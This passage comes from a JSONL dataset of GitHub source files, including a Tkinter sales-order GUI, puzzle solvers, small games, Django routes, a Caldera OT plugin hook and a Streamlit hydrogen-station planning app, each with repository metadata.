frame_central.place(relx=0.5, rely=0.55, anchor=tkinter.CENTER)\n\n #NOTE - btn_voltar\n img_voltar = ctk.CTkImage(light_image=Image.open(\"config/arquivos/img/voltar.png\"), size=(30,30))\n btn_voltar = ctk.CTkButton(\n master=frame_meio,\n width=15,\n height=15,\n text=\"Voltar\",\n font=(font_btn, 15),\n #image=img_voltar,\n #fg_color=\"transparent\",\n command=voltar_prod_func\n )\n btn_voltar.place(relx=0.39, rely=0.08)\n img_home = ctk.CTkImage(light_image=Image.open(\"config/arquivos/img/home.png\"), size=(30,30))\n #NOTE - btn_inicio\n btn_inicio = ctk.CTkButton(\n master=frame_meio,\n width=15,\n height=15,\n text=\"Início\",\n font=(font_btn, 15),\n #image=img_home,\n #fg_color=\"transparent\",\n command=inicio_prod_func\n )\n btn_inicio.place(relx=0.44, rely=0.08)\n\n #NOTE - label_titulo\n label_titulo = ctk.CTkLabel(\n master=frame_meio,\n text=\"Criar Pedido de Venda\",\n font=(\"arial\", 18, \"bold\")\n )\n label_titulo.place(relx=0.5, rely=0.18, anchor=tkinter.CENTER)\n\n #NOTE - label_pesquisar_prod\n label_pesquisar_prod = ctk.CTkLabel(\n master=frame_meio,\n text=\"Produtos\",\n font= (font_texto, 13, \"bold\"),\n fg_color=cor_frame_meio\n )\n label_pesquisar_prod.place(relx=0.43, rely=0.30, anchor=tkinter.CENTER) \n \n #NOTE - combo_pesquisar_prod\n with open(\"config/arquivos/quant_diferenca_estoque.txt\", \"r\") as arquivo:\n quant_diferenca_estoque = arquivo.readlines()\n for i, produto in enumerate(quant_diferenca_estoque):\n quant_diferenca_estoque[i] = str((produto.split(\" | 
\"))[1]).replace(\"\\n\",\"\")\n combo_pesquisar_prod = ctk.CTkComboBox(\n master=frame_meio,\n values=quant_diferenca_estoque,\n width=150,\n height=25, \n )\n combo_pesquisar_prod.place(relx=0.53, rely=0.30, anchor=tkinter.CENTER)\n combo_pesquisar_prod.bind(\"\", pesquisar_prod_func)\n\n #NOTE - label_quantidade \n label_quantidade = ctk.CTkLabel(\n master=frame_meio,\n text=\"Quantidade\",\n font=(font_texto, 13, \"bold\"),\n fg_color=cor_frame_meio\n )\n label_quantidade.place(relx=0.43, rely=0.36, anchor=tkinter.CENTER) \n\n #NOTE - entry_quantidade\n entry_quantidade = ctk.CTkEntry(\n master=frame_meio,\n width=150,\n height=25,)\n entry_quantidade.place(relx=0.53, rely=0.36, anchor=tkinter.CENTER)\n\n #NOTE - label_valor \n label_valor = ctk.CTkLabel(\n master=frame_meio,\n text=\"Valor Un.\",\n font=(font_texto, 13, \"bold\"),\n fg_color=cor_frame_meio\n )\n label_valor.place(relx=0.43, rely=0.42, anchor=tkinter.CENTER) \n\n #NOTE - entry_valor\n entry_valor = ctk.CTkEntry(\n master=frame_meio,\n width=150,\n height=25,)\n entry_valor.place(relx=0.53, rely=0.42, anchor=tkinter.CENTER)\n entry_valor.bind(\"\", adicionar_prod_btn_event_func)\n\n #NOTE - btn_adicionar_produto\n btn_adicionar_produto = ctk.CTkButton(\n master=frame_meio,\n width=150,\n height=25,\n text=\"Adicionar Produto\",\n font=(font_btn, 15),\n border_width=0,\n command = adicionar_prod_btn_func)\n btn_adicionar_produto.place(relx=0.53, rely=0.50, anchor=ctk.CENTER)\n #NOTE - btn_remover_ultimo\n btn_remover_ultimo = ctk.CTkButton(\n master=frame_meio,\n width=125,\n height=25,\n text=\"Remover último produto\",\n font=(font_btn, 13),\n command = remover_ultimo_btn_func)\n btn_remover_ultimo.place(relx=0.53, rely=0.56, anchor=ctk.CENTER)\n #NOTE - btn_limpar \n btn_limpar = ctk.CTkButton(\n master=frame_meio,\n width=150,\n height=25,\n text=\"Limpar\",\n font=(font_btn, 15),\n command = limpar_prods_selecionados)\n btn_limpar.place(relx=0.53, rely=0.62, anchor=ctk.CENTER)\n \n #NOTE - label_clientes\n label_clientes = ctk.CTkLabel(\n master=frame_meio,\n text=\"Cliente\",\n fg_color=cor_frame_meio,\n font= (font_texto, 13, \"bold\"),\n )\n label_clientes.place(relx=0.43, rely=0.68, anchor=tkinter.CENTER)\n\n #NOTE - combo_cliente\n combo_cliente = ctk.CTkComboBox(\n master=frame_meio,\n values=lista_clientes,\n width=150,\n height=25,\n )\n combo_cliente.place(relx=0.53, rely=0.68, anchor=tkinter.CENTER)\n combo_cliente.bind(\"\", pesquisar_cliente_func)\n\n #NOTE - label_data \n label_data = ctk.CTkLabel(\n master=frame_meio,\n text=\"Data\",\n font=(font_texto, 13, \"bold\"),\n fg_color=cor_frame_meio\n )\n label_data.place(relx=0.43, rely=0.74, anchor=tkinter.CENTER) \n\n #NOTE - entry_data\n entry_data = ctk.CTkEntry(\n master=frame_meio,\n width=150,\n height=25,)\n entry_data.place(relx=0.53, rely=0.74, anchor=tkinter.CENTER)\n\n\n #NOTE - label_prazo \n label_prazo = ctk.CTkLabel(\n master=frame_meio,\n text=\"Prazo\",\n font=(font_texto, 13, \"bold\"),\n fg_color=cor_frame_meio\n )\n label_prazo.place(relx=0.43, rely=0.80, anchor=tkinter.CENTER) \n\n #NOTE - entry_prazo\n lista_prazo = [\"A vista\",\n \"7 dias\",\n \"14 Dias\",\n \"21 Dias\",\n \"30 Dias\",\n \"45 Dias\",\n \"60 Dias\"]\n combo_prazo = ctk.CTkComboBox(master=frame_meio,\n values=lista_prazo,\n width=150,\n height=25)\n combo_prazo.place(relx=0.53, rely=0.80, anchor=tkinter.CENTER)\n\n #NOTE - btn_concluir_cliente\n btn_concluir_cliente = ctk.CTkButton(\n master=frame_meio,\n width=150,\n height=25,\n text=\"Concluir Cliente\",\n 
font=(font_btn, 15),\n command=concluir_cliente_func\n )\n btn_concluir_cliente.place(relx=0.53, rely=0.85, anchor=tkinter.CENTER)\n\n #NOTE - btn_gerar_pedido_venda\n btn_gerar_pedido_venda = ctk.CTkButton(\n master=frame_meio,\n width=150,\n height=25,\n text=\"Gerar pedido de venda\",\n font=(font_btn, 15),\n fg_color=\"#00993D\",\n hover_color=(\"#007830\"),\n command=btn_pedido_venda_func\n )\n btn_gerar_pedido_venda.place(relx=0.53, rely=0.93, anchor=tkinter.CENTER)\n #!SECTION\n\n #SECTION - Direita\n \n #NOTE - text_prod_selecionados\n text_prod_selecionados = ctk.CTkTextbox(\n master=frame_meio,\n width=300,\n height=230,\n font=(\"Arial\", 12)\n )\n text_prod_selecionados.place(relx=0.74, rely=0.27, anchor=tkinter.CENTER)\n text_prod_selecionados.configure(state=\"disabled\")\n\n #NOTE - label_prod_selecionados\n label_prod_selecionados = ctk.CTkLabel(\n master=frame_meio,\n text=\"Produtos Selecionados\",\n font=(\"Arial\", 15, \"bold\"),\n fg_color=cor_fundo\n )\n label_prod_selecionados.place(relx=0.74, rely=0.03, anchor=tkinter.CENTER)\n\n #NOTE - text_venda\n text_venda = ctk.CTkTextbox(\n master=frame_meio,\n width=300,\n height=230,\n font=(\"Arial\", 12)\n )\n text_venda.place(relx=0.74, rely=0.75, anchor=tkinter.CENTER)\n text_venda.configure(state=\"disabled\")\n\n #NOTE - label_clientes\n label_clientes = ctk.CTkLabel(\n master=frame_meio,\n text=\"Pedidos por clientes\",\n font=(\"Arial\", 15, \"bold\"),\n fg_color=cor_fundo\n )\n label_clientes.place(relx=0.74, rely=0.51, anchor=tkinter.CENTER)\n\n #!SECTION\n\n janela_pedido_venda.mainloop()\n#!SECTION\n#janela_pedido_venda_func(\"sub_janela_relatorio\", \"produtos_estoque\", \"text_relatorio\")\n","repo_name":"VinicioSales/controladorDeEstoques","sub_path":"config/instancias/janelas/janela_pedido_venda.py","file_name":"janela_pedido_venda.py","file_ext":"py","file_size_in_byte":38521,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22566292922","text":"import heapq\nfrom collections import defaultdict\n\nfrom rich import print\n\n\ndef get_input():\n input = {}\n with open(\"input.txt\") as input_txt:\n for x, line in enumerate(input_txt):\n for i, n in enumerate(line.strip()):\n input[(i, x)] = int(n)\n return input\n\n\ndef dijkstra(grid):\n destination = defaultdict(lambda: float('inf'))\n nodes = [(0, (0, 0))]\n while len(nodes) > 0:\n point, (i, n) = heapq.heappop(nodes)\n for node in ((i, n + 1), (i, n - 1), (i + 1, n), (i - 1, n)):\n if node not in grid:\n continue\n\n points = point + grid[node]\n if points < destination[node]:\n destination[node] = points\n heapq.heappush(nodes, (points, node))\n\n return destination[max(destination.keys())]\n\n\ndef part_1(input):\n return dijkstra(input)\n\n\ndef part_2(input):\n width, height = max(input.keys())\n height += 1\n width += 1\n\n map = input.copy()\n for first in range(5):\n for second in range(5):\n total = first + second\n if total == 0:\n continue\n\n for (i, n), points in input.items():\n value = points + total\n if value > 9:\n value -= 9\n map[(i + (second * width), n + (first * height))] = value\n\n return dijkstra(map)\n\n\nif __name__ == \"__main__\":\n input = get_input()\n\n part_1 = part_1(input)\n print(f\"Puzzle Part 1: {part_1}\")\n\n part_2 = part_2(input)\n print(f\"Puzzle Part 2: 
{part_2}\")\n","repo_name":"promarcel/advent-of-code-2021","sub_path":"15/chiton.py","file_name":"chiton.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74524388328","text":"import re\r\nimport logging\r\n\r\nfrom config import vk_user\r\n\r\n\r\nasync def get_comment(id, url):\r\n ids = url.split('wall')[1].split('_')\r\n get_coms = await vk_user.api.wall.get_comments(owner_id=ids[0], post_id=ids[1], need_likes=0, sort='desc')\r\n comments = get_coms.items\r\n com = False\r\n for i in comments:\r\n if i.from_id == id:\r\n com = True\r\n words = [j for j in re.findall(r'\\w+', i.text) if len(j) > 3]\r\n if len(words) > 5:\r\n return True, i.text\r\n if com:\r\n return False, 'Комментарий слишком короткий'\r\n return False, 'Комментарий не найден'\r\n\r\n\r\nasync def get_post(url):\r\n wall = None\r\n video = False\r\n try:\r\n wall = url.split('wall')\r\n if len(wall) != 2:\r\n raise Exception(f'Lenght of list wall (wall) is not 2, but {len(wall)}')\r\n \r\n if wall[0][-1] == '=':\r\n url = 'https://vk.com/wall'+wall[1]\r\n \r\n id = url[-1]\r\n int(id)\r\n except Exception as e:\r\n logging.error(e)\r\n\r\n try:\r\n if url[-4:] == '?c=0':\r\n url = url[:-4]\r\n \r\n wall = url.split('clip')\r\n if len(wall) != 2:\r\n raise Exception(f'Lenght of list wall (clip) is not 2, but {len(wall)}')\r\n \r\n if wall[0][-1] == '=':\r\n url = 'https://vk.com/clip'+wall[1]\r\n \r\n id = url[-1]\r\n int(id)\r\n except Exception as e:\r\n logging.error(e)\r\n return False, 'Неправильная ссылка на пост или же пост не найден'\r\n \r\n return False, 'Допускаются ссылки на посты, начинающиеся с \"wall\"'\r\n\r\n try:\r\n post = await vk_user.api.wall.get_by_id(posts=[wall[1]])\r\n type = 'group'\r\n author = post[0].from_id\r\n\r\n if author > 0:\r\n type = 'user'\r\n \r\n return True, type\r\n except Exception as e:\r\n logging.error(e)\r\n return False, 'Пост не найден или же страница с постом закрытая'","repo_name":"DragonsCode/vk-comments-and-likes","sub_path":"functions/comments.py","file_name":"comments.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26438671700","text":"#weapon class\nclass Bomb(object):\n def __init__(self, timer, playernum, bombradius):\n self.timer = timer\n #records down number by player\n self.playernum = playernum\n self.bombradius = bombradius\n self.weaponID = 0\n\n def countDown(self):\n if self.timer > 0:\n self.timer -= 1\n\n\nclass Explosion(object):\n def __init__(self, centerRow, centerCol, playernum, bombRadius):\n self.centerRow = centerRow\n self.centerCol = centerCol\n #list of coordinates containing the radius\n self.radius = []\n self.timer = 2\n #controls whose explosion belongs to whom\n self.playernum = playernum\n self.bombRadius = bombRadius\n self.bombdcoordinate = [(0,0)]\n\n def createBombchangeRowCol(self):\n baseRadius = [(0,1), (1,0), (-1,0), (0, -1)]\n for i in range(1, self.bombRadius + 1):\n for row, col in baseRadius:\n self.bombdcoordinate.append((row*i, col*i))\n","repo_name":"Icyviolet23/Bomb_It_112_TP","sub_path":"weapon.py","file_name":"weapon.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2556413229","text":"from django.conf.urls.defaults import patterns, include, url\nfrom chihuo.views import main_view\nfrom django.conf 
import settings\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'chihuo.views.home', name='home'),\n # url(r'^chihuo/', include('chihuo.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\turl(r'^$', 'chihuo.views.main_view'),\n\turl(r'^join-us/$', 'chihuo.views.join_us'),\n\turl(r'^category/(\\d+)/$', 'chihuo.views.category_view'),\n\turl(r'^login/$', 'chihuo.people.views.login'),\n\turl(r'^logout/$', 'chihuo.people.views.logout'),\n\turl(r'^register/$', 'chihuo.people.views.register'),\n\turl(r'^rsvp/$', 'chihuo.rsvp.views.index'),\n\turl(r'^rsvp/join/$', 'chihuo.rsvp.views.join'),\n\turl(r'^rsvp/create/$', 'chihuo.rsvp.views.create_event'),\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n)\n\nif settings.DEBUG:\n urlpatterns += patterns('',\n (r'^media/(?P.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT}),\n )","repo_name":"yeeppe/chihuo","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34257977106","text":"# 정확도 테스트\n# 테스트 1 〉\t통과 (0.21ms, 10.4MB)\n# 테스트 2 〉\t통과 (0.92ms, 10.4MB)\n# 테스트 3 〉\t통과 (0.21ms, 10.4MB)\n# 테스트 4 〉\t통과 (0.37ms, 10.5MB)\n# 테스트 5 〉\t통과 (0.21ms, 10.5MB)\n# 테스트 6 〉\t통과 (0.21ms, 10.5MB)\n# 테스트 7 〉\t통과 (0.21ms, 10.4MB)\n# 테스트 8 〉\t통과 (0.21ms, 10.3MB)\n# 테스트 9 〉\t통과 (0.10ms, 10.5MB)\n# 테스트 10 〉\t통과 (0.03ms, 10.5MB)\n\n# 효율성 테스트\n# 테스트 1 〉\t통과 (114.78ms, 10.7MB)\n# 테스트 2 〉\t통과 (110.47ms, 10.7MB)\n# 테스트 3 〉\t통과 (112.55ms, 10.7MB)\n# 테스트 4 〉\t통과 (115.92ms, 10.7MB)\n# 테스트 5 〉\t통과 (124.00ms, 10.8MB)\n# 테스트 6 〉\t통과 (112.67ms, 10.8MB)\n# 테스트 7 〉\t통과 (110.01ms, 10.7MB)\n# 테스트 8 〉\t통과 (124.12ms, 10.7MB)\n\n\ndef solution(arr):\n\n # 숫자와 연산자를 분리\n d = [int(item) for item in arr if item.isdigit()]\n op = [item for item in arr if not item.isdigit()]\n\n lend = len(d)\n\n # 최댓값과 최솟값을 담은 dp를 활용\n # dp[i][j]는 d의 i원소부터 j원소까지의 연산의 최댓값/최솟값을 적을 것임\n max_dp = [[-10 ** 9] * len(d) for _ in range(lend)]\n min_dp = [[10 ** 9] * len(d) for _ in range(lend)]\n\n # dp[i][i]는 연산 없이 i원소 자신\n for i in range(lend):\n max_dp[i][i] = d[i]\n min_dp[i][i] = d[i]\n\n\n for diag in range(1, lend):\n for i in range(0, lend - diag):\n j = i + diag\n\n for k in range(i, j):\n M = 0\n m = 0\n if op[k] == \"+\": # 더하기일때 최댓값과 최솟값!\n M = max_dp[i][k] + max_dp[k + 1][j]\n m = min_dp[i][k] + min_dp[k + 1][j]\n else: # 빼기일때 최댓값과 최솟값!\n M = max_dp[i][k] - min_dp[k + 1][j]\n m = min_dp[i][k] - max_dp[k + 1][j]\n\n # 최대, 최소 갱신\n max_dp[i][j] = max(max_dp[i][j], M)\n min_dp[i][j] = min(min_dp[i][j], m)\n\n return max_dp[0][-1]","repo_name":"leehyeonmin34/algorithm","sub_path":"src/programmers/level4/Programmers_사칙연산.py","file_name":"Programmers_사칙연산.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12472944967","text":"q = int(input())\nabcList = []\nfor i in range(q):\n abcList.append([int(x) for x in input().split()])\n\ndef fer(a, b, c):\n def f(x):\n return x ** 3 + a * x ** 2 + b * x - c\n def fp(x):\n return 3 * x ** 2 + 2 * a * x + b\n return f, fp \n\ndef newton(f, fp, e=1e-6):\n x0 = 0\n x_n = x0 - f(x0) / fp(x0)\n while abs(x_n - x0) > e:\n x0 = x_n\n x_n = x0 - f(x0) / fp(x0)\n return x_n\n\nfor abc in abcList:\n f, fp = 
fer(*abc)\n print(newton(f=f, fp=fp))","repo_name":"wzdlc1996/PhyGO","sub_path":"JobSeeking/leonard/Research/problem03.py","file_name":"problem03.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"2250710871","text":"# game.py\n# Authors:\n# Alastair, Lucian\n# This file should run your game.\n#\n# You can (and should) create other files and modules to import them\n# here as needed.\n\nfrom quest.game import QuestGame\nfrom quest.map import TiledMap\nfrom quest.sprite import Background, Wall, NPC, QuestSprite, Player\nfrom quest.helpers import scale, resolve_resource_path\nfrom quest.strategy import RandomWalk\nimport arcade\nimport os\nfrom pathlib import Path\nimport time\n\n\nclass Maze(QuestGame):\n \"\"\"A very simple subclass of :py:class:`QuestGame`.\n\n To run this example::\n\n $ python -m quest.examples.island\n\n :py:class:`IslandAdventure` shows off the basic features of the Quest\n framework, loading a map and letting the player explore it.\n After you play it, check out the sorce code by clicking on \"source\" in the\n blue bar just above.\n \"\"\"\n\n player_sprite_image = (\"images/DungeonTiles/frames/knight_m_idle_anim_f1.png\")\n screen_width = 300\n screen_height = 300\n left_viewport_margin = 150\n right_viewport_margin = 150\n bottom_viewport_margin = 150\n top_viewport_margin = 150\n player_initial_x = 340\n player_initial_y = 250\n player_speed = 3\n health = 100\n\n\n def reduce_health(self):\n self.health = self.health - 20\n if self.health <= 0:\n print(\"you died\")\n self.player.center_x = self.player_initial_x\n self.player.center_y = self.player_initial_y\n self.health = 100\n\n\n\n\n def setup_maps(self):\n \"\"\"Sets up the map.\n\n Uses a :py:class:`TiledMap` to load the map from a ``.tmx`` file,\n created using :doc:`Tiled `.\n \"\"\"\n super().setup_maps()\n sprite_classes = {\n \"walls\": Wall,\n \"play\": Background,\n \"exit\": Background,\n }\n island_map = TiledMap((\"images/qwerty_game_1.tmx\"), sprite_classes)\n self.add_map(island_map)\n\n\n def setup_walls(self):\n \"\"\"Assigns sprites to `self.wall_list`. 
These sprites will function as walls, blocking\n the player from passing through them.\n \"\"\"\n self.wall_list = self.get_current_map().get_layer_by_name(\"walls\").sprite_list\n\n def instructions(self):\n print(\" \")\n print(\"W,A,S,D to move, SPACE to attack\")\n\n\n def setup_npcs(self):\n npc_data = []\n for i in range(1):\n npc_data.append([mob, \"images/DungeonTiles/frames/big_demon_idle_anim_f3.png\", 0.8, 500, 140])\n npc_data.append([mob, \"images/DungeonTiles/frames/big_demon_idle_anim_f3.png\", 0.8, 100, 140])\n self.npc_list = arcade.SpriteList()\n for sprite_class, image, scale, x, y in npc_data:\n sprite = sprite_class(image, scale)\n sprite.center_x = x\n sprite.center_y = y\n self.npc_list.append(sprite)\n\n monster = self.npc_list[0]\n walk = RandomWalk(0.03)\n monster.strategy = walk\n\n monster2 = self.npc_list[1]\n walk = RandomWalk(0.03)\n monster2.strategy = walk\n\nclass mob(NPC):\n repel_distance = 20\n hit = False\n hit_count= 0\n\n def on_collision(self, sprite, game):\n if isinstance(sprite, Player):\n self.repel(sprite)\n game.reduce_health()\n self.hit = True\n print(game.health)\n\n def on_update(self,game):\n if self.hit == True and self.hit_count <150:\n self.stop()\n self.hit_count +=1\n elif self.strategy:\n self.set_course(self.strategy.choose_course(self, game))\n self.hit_count = 0\n self.hit = False\n\n\n def repel(self, sprite):\n \"Backs the sprite away from self\"\n away = (self.center_x - sprite.center_x, self.center_y - sprite.center_y)\n away_x, away_y = scale(away, self.repel_distance)\n sprite.center_x = sprite.center_x - away_x\n sprite.center_y = sprite.center_y - away_y\n sprite.stop()\n\nif __name__ == '__main__':\n game = Maze()\n game.instructions()\n game.run()\n","repo_name":"the-isf-academy/project-game-qwerty","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38582458768","text":"from app.utility.base_world import BaseWorld\n\nfrom plugins.ot.app.ot_gui import OTGUI\nfrom plugins.ot.app.ot_api import OTAPI\n\nname = 'OT'\ndescription = 'The OT plugin for Caldera provides adversary emulation abilities specific to Operational Technology.'\naddress = '/plugin/ot/gui'\naccess = BaseWorld.Access.RED\n\n\nasync def enable(services):\n app = services.get('app_svc').application\n ot_gui = OTGUI(services, name=name, description=description)\n\n app.router.add_static('/ot', 'plugins/ot/static/', append_version=True)\n app.router.add_route('GET', '/plugin/ot/gui', ot_gui.splash)\n\n ot_api = OTAPI(services)\n # Add API routes here\n app.router.add_route('POST', '/plugin/ot/mirror', ot_api.mirror)\n\n","repo_name":"activeshadow/caldera-ot","sub_path":"hook.py","file_name":"hook.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23044887064","text":"import streamlit as st\nimport pandas as pd\nimport plotly.graph_objects as go\nimport plotly.express as px\n\nimport sys\n\nimport hub_clustering.params as p\nimport hub_clustering.utils as f\nimport hub_clustering.hubstation_sizer as sizer\n\n\nimport hub_clustering.streamlit_function as l\n\nst.header(\"Station locations to meet 100% of demand\")\n\nst.write(\"\"\"This page presents the **distribution of H2 stations** according to the scenario considered (optimistic, moderate or conservative) and the year (2030 or 2040).\n\nThe parameters that allowed 
us to estimate the demand and therefore the location and size of the stations can be modified, in particular because they are likely to evolve in the next 10 or 20 years.\n\"\"\",\n unsafe_allow_html=True)\n\n\n# Setting default values\n#scenario = \"moderate\"\nheight = 6\nreplacement_rate = 15\ntruck_capacity = 100\n\n# Converting scenario strings to index\nscenario_indexes = {\"optimistic\": 0, \"moderate\": 1, \"conservative\": 2}\n\n\nscenario = st.radio(\"Scenario:\",\n ('optimistic', 'moderate', 'conservative'),\n 1,\n horizontal=True)\n\n\ncol1, col2 = st.columns(2)\n#year = \"2030\" # Setting default\nyear = st.radio(\"Year:\",\n ('2030', '2040'),\n 0,\n horizontal=True)\n\nwith st.sidebar:\n height = st.slider(\n \"Select average height (in meters) for a warehouse\", 5, 15, value=height\n )\n replacement_rate = st.slider(\n \"Select average inventory turnover time (in days)\",\n 7,\n 25,\n value=replacement_rate,\n )\n truck_capacity = st.slider(\n \"Select average truck capacity (in cubic meters) for a H2 truck\",\n 70,\n 200,\n value=truck_capacity,\n )\n\n\n# Loading Road Stations data\nroad_data = l.load_and_prepare_location()\n\nfrequency, affluence = p.ROAD_HUB_THRESHOLDS[year][scenario_indexes[scenario]]\n_, road_stations = l.intermediateStations(road_data, frequency, affluence)\nroad_stations = road_stations[road_stations.is_stationable == 1]\n\nnumber_of_trucks = p.NUMBER_OF_TRUCKS[year]\nhydrogene_kg_served_by_hubs = p.HYDROGENE_SERVED_BY_HUBS[year]\nroad_profitability = l.get_profitability_info(\n road_stations, number_of_trucks, hydrogene_kg_served_by_hubs\n)\n\nto_map_roads = pd.merge(road_stations, road_profitability, on=\"route\", how=\"left\")\nto_map_roads.rename({\"latD\": \"latitude\", \"lonD\": \"longitude\"}, axis=1, inplace=True)\n\n\n# Loading Hub Stations data\n\nhub_data = f.load_data()\nprint(scenario)\ndf = f.filter_dataset(hub_data, scenario=scenario, year=year)\nfinal_dataset, centroids_df = f.run_kmeans(df, scenario=scenario, year=year)\n\ncentroids_df.reset_index(inplace=True)\ncentroids_df.columns = [\"centroid_id\", \"region\", \"latitude\", \"longitude\"]\ncentroids_df.sort_values(by=[\"region\", \"centroid_id\"])\n\nh2_kg_demand = (\n df[\"Surface totale\"]\n .pipe(sizer.compute_total_volume, height=height)\n .pipe(sizer.compute_daily_stock_volume_gone, replacement_rate=replacement_rate)\n .pipe(sizer.compute_daily_nb_trucks, truck_capacity=truck_capacity)\n .pipe(sizer.compute_daily_nb_h2_trucks)\n .pipe(sizer.compute_daily_h2_demand)\n)\n\nfinal_dataset[\"h2_kg_demand\"] = h2_kg_demand\nfinal_dataset[\"surface_totale\"] = df[\"Surface totale\"]\n\n\ndf_stations_type = final_dataset.groupby(\n [\"Région d'implantation\", \"centroid\"], as_index=False\n).agg({\"centroid_coord\": \"first\", \"h2_kg_demand\": \"sum\", \"surface_totale\": \"sum\"})\n\n\ndf_stations_type[\"stations_type\"] = df_stations_type[\"h2_kg_demand\"].apply(\n sizer.stations_type\n)\n\ndf_stations_type = df_stations_type[\n [\"h2_kg_demand\", \"stations_type\", \"surface_totale\"]\n].merge(centroids_df, left_index=True, right_on=\"centroid_id\")\n\n\ndf_stations_type[\"station_utilization_rate\"] = df_stations_type.apply(\n lambda x: sizer.station_utilization_rate(x.h2_kg_demand, x.stations_type), axis=1\n)\n\ndf_stations_type[\"plotly_station_utilization_rate\"] = df_stations_type.apply(\n lambda x: sizer.plotly_station_utilization_rate(x.h2_kg_demand, x.stations_type),\n axis=1,\n)\n\n\n# Merging both datasets\ndf_stations_type.rename({\"stations_type\": \"size_station\"}, 
axis=1, inplace=True)\nhubs_to_plot = df_stations_type[[\"latitude\", \"longitude\", \"size_station\"]]\nhubs_to_plot[\"type\"] = \"hub\"\n\nroads_to_plot = to_map_roads[[\"latitude\", \"longitude\", \"size_station\"]]\nroads_to_plot[\"type\"] = \"road\"\n\ndf_to_plot = pd.concat([hubs_to_plot, roads_to_plot])\ndf_to_plot.loc[df_to_plot['size_station']=='small', 'size_of_marker'] = 1\ndf_to_plot.loc[df_to_plot['size_station']=='medium', 'size_of_marker'] = 5\ndf_to_plot.loc[df_to_plot['size_station']=='large', 'size_of_marker'] = 10\n\n\ndef visualize_on_map_contrast(df_to_plot, contrast=\"type\"):\n if contrast==\"type\":\n colors={\"hub\": \"green\", \"road\": \"blue\"}\n else:\n colors={\"small\": \"blue\", \"medium\": \"green\", \"large\": \"orange\"}\n \n fig = px.scatter_mapbox(\n df_to_plot,\n lat=\"latitude\",\n lon=\"longitude\",\n zoom=5,\n height=800,\n width=800,\n size='size_of_marker',\n size_max=12,\n hover_name='type',\n color=contrast,\n color_discrete_map=colors,\n )\n fig.update_layout(mapbox_style=\"open-street-map\")\n fig.update_layout(margin={\"r\": 0, \"t\": 0, \"l\": 0, \"b\": 0})\n return fig\n\n\n# Mapping\n\nst.subheader(\"Stations according to type (hubs vs roads)\")\ncol1_type, col2_type, col3_type = st.columns(3)\nhubs = df_to_plot[df_to_plot.type == \"hub\"].shape[0]\nroads = df_to_plot[df_to_plot.type == \"road\"].shape[0]\ncol1_type.metric(\"Hub stations\", hubs)\ncol2_type.metric(\"Road stations\", roads)\ncol3_type.metric(\"**Total number of stations**\", hubs+roads)\nst.plotly_chart(visualize_on_map_contrast(df_to_plot))\n\n\n# Mapping\n\nst.subheader(\"Stations according to size (small, medium, large)\")\ncol1_size, col2_size, col3_size, col4_size = st.columns(4)\nsmall = df_to_plot[df_to_plot.size_station == \"small\"].shape[0]\nmedium = df_to_plot[df_to_plot.size_station == \"medium\"].shape[0]\nlarge = df_to_plot[df_to_plot.size_station == \"large\"].shape[0]\ncol1_size.metric(\"Small stations\", small)\ncol2_size.metric(\"Medium stations\", medium)\ncol3_size.metric(\"Large stations\", large)\ncol4_size.metric(\"**Total number of stations**\", small+medium+large)\nst.plotly_chart(visualize_on_map_contrast(df_to_plot, contrast=\"size_station\"))\n\n","repo_name":"Pointing9212/airliquide","sub_path":"webapp_final/pages/2_Station_Locations.py","file_name":"2_Station_Locations.py","file_ext":"py","file_size_in_byte":6325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29179569194","text":"from multiprocessing import Process\nimport os\nimport pandas\n\nip_list = [\"192.168.1.205\", \"192.168.1.236\", \"192.168.1.219\", \"192.168.1.198\",\n \"192.168.1.194\", \"192.168.1.151\", \"192.168.1.247\", \"192.168.1.130\", \n \"192.168.1.187\", \"192.168.1.51\", \"192.168.1.33\", \"192.168.1.211\"]\n\ndef job(ip, recipe_name, detect_region_dilation, detect_region_low_threshold, \n detect_region_high_threshold, complete_region_dilation, \n complete_region_low_threshold, complete_region_high_threshold, \n complete_ratio, second_detect_region_dilation,\n second_detect_region_low_threshold, \n second_detect_region_high_threshold):\n \n print(\"start process {} {}\".format(ip, recipe_name))\n os.system(\"python detect_region_job.py {} {} {} {} {} {} {} {} {} {} {} {}\".format(ip, recipe_name,\n detect_region_dilation, \n detect_region_low_threshold, \n detect_region_high_threshold, \n complete_region_dilation, \n complete_region_low_threshold, \n complete_region_high_threshold, \n complete_ratio,\n 
